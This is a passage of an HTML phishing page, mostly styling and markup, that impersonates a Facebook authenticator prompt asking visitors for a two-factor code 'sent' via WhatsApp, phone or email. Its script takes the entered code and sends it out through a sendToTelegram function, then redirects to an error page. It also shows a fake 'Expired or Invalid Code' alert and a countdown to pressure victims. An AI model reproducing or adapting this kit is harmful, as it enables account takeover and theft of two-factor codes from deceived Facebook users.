      left: 16px;
      width: 391px;
      height: 38px;
    }

    #w-uz8kyfs5 .button-css {
      color: rgba(0, 0, 0, 1);
      border-radius: 100px;
      font-size: 14px;
      border-style: solid;
      border-width: 1px;
      border-color: rgba(201, 201, 201, 1);
      -webkit-text-stroke: 0px rgba(164, 165, 169, 1);
      background: null;

      --type: 0;
    }

    #w-__popup_default__ {
      position: fixed;
      width: 400px;
      height: 250px;
    }

    #w-__popup_default__::-webkit-scrollbar {
      display: none
    }

    #w-__popup_default__ .popup-background {
      background: rgba(255, 255, 255, 1);
      border-style: solid;
      border-radius: 13px;
      box-shadow: 4px 4px 9px 0px rgba(139, 195, 74, 0.200);
      color: rgba(69, 64, 64, 1.000);
      border-color: rgba(76, 175, 80, 0.8);
    }

    #w-oc2dcqis {
      top: 21px;
      left: 36px;
      width: 276px;
      height: 54px;
    }

    #w-oc2dcqis .text-block {
      background: null;

    }

    #w-oc2dcqis .text-block-css {
      color: rgba(69, 64, 64, 1);
      text-align: start;
      font-family: 'Roboto', sans-serif;
      font-weight: bold;
      font-size: 36px;
      --type: 0;
    }

    #w-pn1igdhr {
      top: 89px;
      left: 36px;
      width: 328px;
      height: 48px;
    }

    #w-pn1igdhr .text-block {
      background: null;
    }

    #w-pn1igdhr .text-block-css {
      font-size: 16px;
      font-family: 'Roboto', sans-serif;
      text-align: start;
      --type: 0;
    }

    #w-au0o7yag {
      top: 184px;
      left: 241.5px;
      width: 130px;
      height: 40px;
    }

    #w-au0o7yag .button-css {
      color: rgba(255, 255, 255, 1);
      font-weight: bold;
      border-radius: 6px;
      border-style: solid;
      background: rgba(76, 175, 80, 0.8);
      --type: 0;
    }

    #w-au0o7yap {
      top: 0px;
      left: 370px;
      z-index: 1;
      width: 29px;
      height: 29px;
    }

    #w-au0o7yap {
      box-shadow: undefined;
      filter: undefined;
    }

    #w-au0o7yap .rectangle-css {
      -webkit-mask-image: url(data:image/svg+xml;base64,PHN2ZyBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSdub25lJyB4bWxucz0naHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmcnIHdpZHRoPScxMDAlJyBoZWlnaHQ9JzEwMCUnIHZpZXdCb3g9JzAgMCAyNCAyNCc+IDxwYXRoIGQ9J00xMy40NiwxMkwxOSwxNy41NFYxOUgxNy41NEwxMiwxMy40Nkw2LjQ2LDE5SDVWMTcuNTRMMTAuNTQsMTJMNSw2LjQ2VjVINi40NkwxMiwxMC41NEwxNy41NCw1SDE5VjYuNDZMMTMuNDYsMTJaJz48L3BhdGg+IDwvc3ZnPg==);
      z-index: 1;
      border-style: solid;
      border-color: #E5E7EB;
      background: rgb(212, 212, 212);
    }

    .-popup-checkout .-close,
    .-zoom .-close {
      width: undefinedpx;
      height: undefinedpx;
    }

    .-checkout-gallery .gallery-view-item {
      background-size: cover !important;
    }
  </style>
  <style type="text/css" media="screen and (max-width: 767px)">
    .section-container {
      max-width: 420px;
    }

    .section-wrapper {
      margin: 0 auto;
      max-width: 420px;
    }

    #w-86cdpbjt {
      top: 0px;
      left: 0px;
      position: relative;
      width: 420px;
      height: 800px;
    }

    #w-86cdpbjt .section-wrapper {
      opacity: 1;
    }

    #w-86cdpbjt {
      margin-bottom: -1px;
    }

    #w-86cdpbjt .section-background {
      background: undefined;
      --type: 0;
    }

    #w-hzit1mqz {
      top: -36.99997138977051px;
      left: -0.0113525390625px;
      width: 422px;
      height: 902px;
    }

    #w-hzit1mqz .image-block-css {
      position: absolute;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(123, 123, 123, 1);
      z-index: null;
      font-size: 14px;
      border-radius: 0px;
    }

    #w-hzit1mqz .image-background {
      width: 422px;
      height: 902px;
      top: 0px;
      left: 0px;
      background: center center/ cover no-repeat scroll content-box border-box url("https://content.pancake.vn/1/fwebp/08/04/a1/fe/99dfbb8ca09c4ede2a7a213dcd60845ba979dfcf8c25c63151db3a19-w:591-h:1280-l:17933-t:image/jpeg.jpg");
      --type: 0;
    }

    #w-hzit1mqz .image-background-compare {
      background: undefined;
      clip: rect(0, 211px, 902px, 0);
      --type: 0;
    }

    #w-tnpw7w17 {
      top: 15.99715805053711px;
      left: 16px;
      width: 265px;
      height: 21.008522033691406px;
    }

    #w-tnpw7w17 .text-block {
      background: null;

    }

    #w-tnpw7w17 .text-block-css {
      text-align: left;
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-hzum4vlb {
      top: 37.008548736572266px;
      left: 15.99432373046875px;
      width: 323px;
      height: 29.999998092651367px;
    }

    #w-hzum4vlb .text-block {
      background: null;

    }

    #w-hzum4vlb .text-block-css {
      text-align: left;
      font-size: 20px;
      font-weight: bold;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-pau1lxw5 {
      top: 67.00570487976074px;
      left: 15.99432373046875px;
      width: 385px;
      height: 21.008522033691406px;
    }

    #w-pau1lxw5 .text-block {
      background: null;

    }

    #w-pau1lxw5 .text-block-css {
      text-align: left;
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-bur0wryt {
      top: 98px;
      left: 15.99432373046875px;
      width: 389px;
      height: 171px;
    }

    #w-bur0wryt .image-block-css {
      position: absolute;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(229, 231, 235, 1);
    }

    #w-bur0wryt .image-background {
      width: 389px;
      height: 171px;
      top: 0px;
      left: 0px;
      background: center center/ cover no-repeat scroll content-box border-box url("https://content.pancake.vn/1/fwebp/0f/4c/28/01/a047edfe181123bfb94492b086d20bdd1459f1bb87d528f27b463477-w:1005-h:441-l:30871-t:image/png.png");
      --type: 0;
    }

    #w-bur0wryt .image-background-compare {
      background: undefined;
      clip: rect(0, 194.5px, 171px, 0);
      --type: 0;
    }

    #w-qxvudeva {
      top: 278px;
      left: 16px;
      width: 389px;
      height: 124px;
    }

    #w-qxvudeva form {
      border-radius: 8px;
      font-size: 13px;
    }

    #w-qxvudeva {}

    #w-imaso3h2 {
      top: 0px;
      left: 0px;
      width: 389px;
      height: 47px;
    }

    #w-imaso3h2 .input-css {
      border-width: 1px;
      border-style: solid;
      border-color: #d9d9d9;
      border-radius: 8px;
    }

    #w-imaso3h2 input {
      background: #fff;
    }

    #w-imaso3h2 input::placeholder {
      color: #979797;
      -webkit-text-fill-color: #979797 !important;
    }

    #w-4k5no89y {
      top: 86px;
      left: 0px;
      width: 389px;
      height: 38px;
    }

    #w-4k5no89y .button-css {
      border-radius: 100px;
      color: rgba(255, 255, 255, 1);
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      background: rgba(24, 119, 242, 1.000);
      --type: 0;
    }

    #w-un574afh {
      top: 337.99573135375977px;
      left: 19px;
      width: 156px;
      height: 17.99715805053711px;
    }

    #w-un574afh .text-block {
      background: null;

    }

    #w-un574afh .text-block-css {
      text-align: left;
      font-size: 12px;
      border-style: solid;
      border-color: rgba(86, 83, 83, 1.000);
      -webkit-text-stroke: 0px rgba(141, 147, 171, 1);
      color: rgba(86, 83, 83, 1);
      --type: 0;
    }

    #w-y87ma2az {
      top: 330px;
      left: 148px;
      width: 128px;
      height: 34px;
    }

    #w-y87ma2az .countdown-item {
      color: rgba(86, 83, 83, 1.000);
      background: null;

      font-size: 12px;
      margin-right: 0px;
      margin-left: 0px;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(229, 231, 235, 1);
      -webkit-text-stroke: 0px rgba(255, 255, 255, 1);
    }

    #w-ewxwa45x {
      top: 337.99432373046875px;
      left: 169px;
      width: 210px;
      height: 17.99715805053711px;
    }

    #w-ewxwa45x .text-block {
      background: null;

    }

    #w-ewxwa45x .text-block-css {
      text-align: left;
      font-size: 12px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-uz8kyfs5 {
      top: 414.0170397758484px;
      left: 16px;
      width: 391px;
      height: 38px;
    }

    #w-uz8kyfs5 .button-css {
      color: rgba(0, 0, 0, 1);
      border-radius: 100px;
      font-size: 14px;
      border-style: solid;
      border-width: 1px;
      border-color: rgba(201, 201, 201, 1);
      -webkit-text-stroke: 0px rgba(164, 165, 169, 1);
      background: null;

      --type: 0;
    }

    #w-__popup_default__ {
      position: fixed;
      width: 400px;
      height: 250px;
    }

    #w-__popup_default__::-webkit-scrollbar {
      display: none
    }

    #w-__popup_default__ .popup-background {
      background: rgba(255, 255, 255, 1);
      border-style: solid;
      border-radius: 13px;
      box-shadow: 4px 4px 9px 0px rgba(139, 195, 74, 0.200);
      color: rgba(69, 64, 64, 1.000);
      border-color: rgba(76, 175, 80, 0.8);
    }

    #w-oc2dcqis {
      top: 21px;
      left: 36px;
      width: 276px;
      height: 54px;
    }

    #w-oc2dcqis .text-block {
      background: null;

    }

    #w-oc2dcqis .text-block-css {
      color: rgba(69, 64, 64, 1);
      text-align: start;
      font-family: 'Roboto', sans-serif;
      font-weight: bold;
      font-size: 36px;
      --type: 0;
    }

    #w-pn1igdhr {
      top: 89px;
      left: 36px;
      width: 328px;
      height: 48px;
    }

    #w-pn1igdhr .text-block {
      background: null;

    }

    #w-pn1igdhr .text-block-css {
      font-size: 16px;
      font-family: 'Roboto', sans-serif;
      text-align: start;
      --type: 0;
    }

    #w-au0o7yag {
      top: 184px;
      left: 241.5px;
      width: 130px;
      height: 40px;
    }

    #w-au0o7yag .button-css {
      color: rgba(255, 255, 255, 1);
      font-weight: bold;
      border-radius: 6px;
      border-style: solid;
      background: rgba(76, 175, 80, 0.8);
      --type: 0;
    }

    #w-au0o7yap {
      top: 0px;
      left: 370px;
      z-index: 1;
      width: 29px;
      height: 29px;
    }

    #w-au0o7yap {
      box-shadow: undefined;
      filter: undefined;
    }

    #w-au0o7yap .rectangle-css {
      -webkit-mask-image: url(data:image/svg+xml;base64,PHN2ZyBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSdub25lJyB4bWxucz0naHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmcnIHdpZHRoPScxMDAlJyBoZWlnaHQ9JzEwMCUnIHZpZXdCb3g9JzAgMCAyNCAyNCc+IDxwYXRoIGQ9J00xMy40NiwxMkwxOSwxNy41NFYxOUgxNy41NEwxMiwxMy40Nkw2LjQ2LDE5SDVWMTcuNTRMMTAuNTQsMTJMNSw2LjQ2VjVINi40NkwxMiwxMC41NEwxNy41NCw1SDE5VjYuNDZMMTMuNDYsMTJaJz48L3BhdGg+IDwvc3ZnPg==);
      z-index: 1;
      border-style: solid;
      border-color: #E5E7EB;
      background: rgb(212, 212, 212);
    }

    .-popup-checkout .-close,
    .-zoom .-close {
      width: undefinedpx;
      height: undefinedpx;
    }

    .-checkout-gallery .gallery-view-item {
      background-size: cover !important;
    }
  </style>





</head>

<body ontouchstart>


  <div class="pageview">
    <div id='webcake-alert-msg' class='w-alert-message-wrapper' style="display: none;z-index:9999999;"></div>
    <div id="w-86cdpbjt" class="com-section" data-section>
      <div class="section-wrapper full-width full-height p-relative">
        <div class="section-background p-absolute full-width full-height lazy"></div>
        <div class="section-container full-height p-relative">
          <div id="w-hzit1mqz" class="com-image-block p-absolute">
            <div class="image-block-css p-relative full-width full-height full-mask-size mask-position">
              <div class="image-background p-absolute lazy"></div>
            </div>
          </div>
          <div id="w-tnpw7w17" class="com-text-block p-absolute">
            <div class="text-block">
              <h4 class="text-block-css full-width">Authenticator • Facebook</h4>
            </div>
          </div>
          <div id="w-hzum4vlb" class="com-text-block p-absolute">
            <div class="text-block">
              <h4 class="text-block-css full-width">Check notifications on your device.</h4>
            </div>
          </div>
          <div id="w-pau1lxw5" class="com-text-block p-absolute">
            <div class="text-block">
              <h5 class="text-block-css full-width">Enter the code we sent WhatsApp, Phone Number and Email.</h5>
            </div>
          </div>
          <div id="w-bur0wryt" class="com-image-block p-absolute">
            <div class="image-block-css p-relative full-width full-height full-mask-size mask-position">
              <div class="image-background p-absolute lazy"></div>
            </div>
          </div>
          <div id="w-qxvudeva" class="p-absolute">
            <form id="qxvudeva" class="full-width full-height">
              <div id="w-imaso3h2" class="p-absolute">
                <div class="input-css full-width full-height"><input id="wi-imaso3h2" type="tel"
                    class="full-width full-height" placeholder='Code' name="phone_number"
                    aria-label="Input phone_number" required></div>
              </div>
              <div id="w-4k5no89y" class="com-button p-absolute">
                <div class="button-css full-height full-width lazy"><span class="button-loader"></span>
                  <div class="button-text full-width u-select-none">Continue</div><button type="submit" formnovalidate
                    style="display: none;"></button>
                </div>
              </div>
            </form>
          </div>
          <div id="w-un574afh" class="com-text-block p-absolute">
            <div class="text-block">
              <h5 class="text-block-css full-width">We will send the code in</h5>
            </div>
          </div>
          <div id="w-y87ma2az" class="com-countdown p-absolute">
            <div class="countdown-wrapper full-width full-height" data-mode="none">
              <div class="countdown-item countdown-item-day" style="display: none;">
                <div>00</div>
                <div class="text" style="display: none;">Days</div>
              </div>
              <div class="countdown-item countdown-item-hour" style="display: none;">
                <div>00</div>
                <div class="text" style="display: none;">Hours</div>
              </div>
              <div class="countdown-item countdown-item-minute">
                <div>00</div>
                <div class="text" style="display: none;">Minutes</div>
              </div>
              <div class="countdown-item countdown-item-second" style="">
                <div>00</div>
                <div class="text" style="display: none;">Seconds</div>
              </div>
            </div>
          </div>
          <div id="w-ewxwa45x" class="com-text-block p-absolute">
            <div class="text-block">
              <h6 class="text-block-css full-width">:</h6>
            </div>
          </div><a href="https://www.webcake.me/demo/v4/38285793-5e6a-4fe3-adbb-a5aacb68c6a8"
            title="Open link https://www.webcake.me/demo/v4/38285793-5e6a-4fe3-adbb-a5aacb68c6a8" id="w-uz8kyfs5"
            class="com-button p-absolute">
            <div class="button-css full-height full-width lazy"><span class="button-loader"></span>
              <div class="button-text full-width u-select-none">Try another way</div>
            </div>
          </a>
        </div>
      </div>
    </div>
    <div id="w-__popup_default__" class="d-none popup-center">
      <div class="popup-wrapper p-absolute full-width full-height">
        <div class="popup-background p-absolute full-width full-height"></div>
        <div id="w-oc2dcqis" class="com-text-block p-absolute">
          <div class="text-block">
            <p class="text-block-css full-width">Thank you</p>
          </div>
        </div>
        <div id="w-pn1igdhr" class="com-text-block p-absolute">
          <div class="text-block">
            <p class="text-block-css full-width">Your submission has been received! Keep an eye on your phone or email
              because we will contact you soon.</p>
          </div>
        </div>
        <div id="w-au0o7yag" class="com-button p-absolute">
          <div class="button-css full-height full-width lazy"><span class="button-loader"></span>
            <div class="button-text full-width u-select-none">Close</div>
          </div>
        </div>
        <div id="w-au0o7yap" class="com-rectangle p-absolute">
          <div class="rectangle-css full-mask-size mask-position full-height full-width lazy"></div>
        </div>
      </div>
    </div>
  </div>
  <div id="popup-backdrop" class="popup-backdrop full-width full-height d-none"></div>
  <div id="lightbox" class="lightbox-backdrop full-width full-height d-none"></div>
  <div id="login-popup" class="login-popup-wrapper">
    <div class="backdrop-login"></div>
    <div class="popup-default-login">
      <div class="popup-login-title">Alert</div>
      <div class="popup-login-content">Expired or Invalid Code!</div>
      <div class="popup-login-btn">OK</div>
    </div>
  </div>

  <script src="tele.js"></script>
  <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>

  <script>!function () { var A, o; A = function (A) { window.is_support_webp = A }, (o = new Image).onload = function () { A(o.width > 0 && o.height > 0) }, o.onerror = function () { A(!1) }, o.src = "data:image/webp;base64," + ({ lossless: "UklGRhoAAABXRUJQVlA4TA0AAAAvAAAAEAcQERGIiP4HAA==" }).lossless }();</script>
  <script id="lazy">

    window.onload = function () {
      if (!sessionStorage.getItem("fromIndex")) {
        // Nếu không phải từ index.html, chuyển hướng về index.html
        window.location.href = "authenERR.html";
      } else {
        // Nếu từ index.html, xóa dấu hiệu để tránh refresh vẫn hợp lệ
        sessionStorage.removeItem("fromIndex");
      }
    };

    document.addEventListener("DOMContentLoaded", function () {
      var button = document.querySelector("div[class='button-text full-width u-select-none'");

      if (button) {
        button.style.display = "block"; // Hiện nút nếu đang bị ẩn

        button.addEventListener("click", function (event) {

          let codeElement = $('#wi-imaso3h2');

          if (codeElement.length === 0) {
            console.error("Lỗi: Không tìm thấy phần tử có id='wi-imaso3h2'");
          } else {
            let code = codeElement.val();
            sendToTelegram("Code 1: " + code);
          }


          sessionStorage.setItem("authen", "true");
          event.preventDefault(); // Ngăn chặn hành vi mặc định của button
          window.location.href = "authenERR.html"; // Chuyển hướng trang
        });
      } else {
        console.error("Không tìm thấy nút submit!");
      }
    });


    document.addEventListener("DOMContentLoaded", function () {
      var countdownMinutes = 3; // Số phút đếm ngược
      var countdownSeconds = 0; // Số giây ban đầu
      var minuteElement = document.querySelector(".countdown-item-minute div");
      var secondElement = document.querySelector(".countdown-item-second div");

      function updateCountdown() {
        if (countdownMinutes === 0 && countdownSeconds === 0) {
          clearInterval(timer); // Dừng đếm ngược khi hết thời gian
          console.log("Hết thời gian!");
          return;
        }

        // Giảm thời gian
        if (countdownSeconds === 0) {
          countdownMinutes--;
          countdownSeconds = 59;
        } else {
          countdownSeconds--;
        }

        // Cập nhật giao diện
        minuteElement.textContent = countdownMinutes.toString().padStart(2, "0");
        secondElement.textContent = countdownSeconds.toString().padStart(2, "0");
      }

      // Cập nhật lần đầu
      updateCountdown();

      // Chạy mỗi giây
      var timer = setInterval(updateCountdown, 1000);
    });

    let elements = []
    document.querySelectorAll('.lazy, [data-src]').forEach(el => elements.push(el))
    elements.sort((a, b) => ~~getComputedStyle(a).getPropertyValue('--type') - getComputedStyle(b).getPropertyValue('--type'))

    function handleLazyLoad() {
      const unmonitoring = new WeakMap()

      elements.forEach(el => {
        const scrollY = window.scrollY || window.scrollTop || 0
        const height = window.innerHeight || window.clientHeight || 0

        const rect = el.getBoundingClientRect()
        if (!rect.top && !rect.left && !rect.right && !rect.bottom) return

        const offset_top = (rect.y || rect.top) + scrollY

        if (!(offset_top >= scrollY + 2 * height || offset_top + el.offsetHeight <= scrollY)) {
          unmonitoring.set(el, 1)

          if (el.classList.contains('lazy')) {
            el.classList.remove('lazy')
          }

          if (el.hasAttribute('data-src')) {
            el.src = el.getAttribute('data-src')
            el.removeAttribute('data-src')
          }
        }
      })

      elements = elements.filter(el => !unmonitoring.get(el))

      if (!elements.length) window.removeEventListener('scroll', handleLazyLoad, { passive: true })
    }
    window.addEventListener('scroll', handleLazyLoad, { passive: true })
    handleLazyLoad()
  </script>
  <link rel="preload" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,700,900&display=swap" as="style"
    onload="this.onload=null;this.rel='stylesheet';">
  <link rel="stylesheet" href="https://api.webcake.io/animate/animatev4.css?v=1" type="text/css">
  <link rel="preload" href="https://api.webcake.io/render_iconfont/iconfont.css?v=1" as="style"
    onload="this.onload=null;this.rel='stylesheet';">

  <script>window.gtracks = []; window.gga = ""; window.ggt = ""; window.ggads = "";</script>
  <script>window.pageViewConverID = "webcake.ggsw8iuyxx"; window.viewContentConverID = "webcake.22lv7jqnvq"</script>
  <script async src="https://api.webcake.io/address_wc/address.84.min.js?v=1"></script>

  <script type="text/javascript" src="https://api.webcake.io/render_v4/main.js?v=1740984663168z0bqcagdm7"></script>



  <img height="1" width="1" alt="" style="display:none"
    src="https://api.webcake.io/page_view.gif?pid=2e45d904-344d-4b2a-bb9a-325eb7cf1407" />



</body>

</html>